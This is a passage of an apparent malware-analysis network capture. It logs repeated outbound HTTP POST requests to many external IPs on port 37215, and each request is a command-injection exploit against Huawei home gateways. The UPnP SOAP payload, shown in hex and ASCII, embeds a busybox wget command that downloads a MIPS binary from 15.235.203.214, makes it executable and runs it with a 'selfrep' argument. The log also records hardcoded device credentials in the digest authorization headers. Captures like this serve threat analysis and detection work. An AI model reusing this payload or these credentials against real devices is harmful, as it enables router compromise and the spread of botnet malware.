                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      74192.168.2.234080241.157.99.5437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222129107 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      75192.168.2.235002827.41.96.13637215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222138882 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      76192.168.2.2344174197.38.235.1437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222162962 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      77192.168.2.2343440197.212.61.12937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222162962 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      78192.168.2.2351548172.101.164.7237215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222163916 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      79192.168.2.233447241.90.43.16137215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222163916 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      80192.168.2.2357796197.249.133.13137215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222163916 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      81192.168.2.235748078.242.93.22837215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222163916 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      82192.168.2.233480841.19.255.6637215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222163916 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      83192.168.2.233678869.74.218.3537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222163916 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 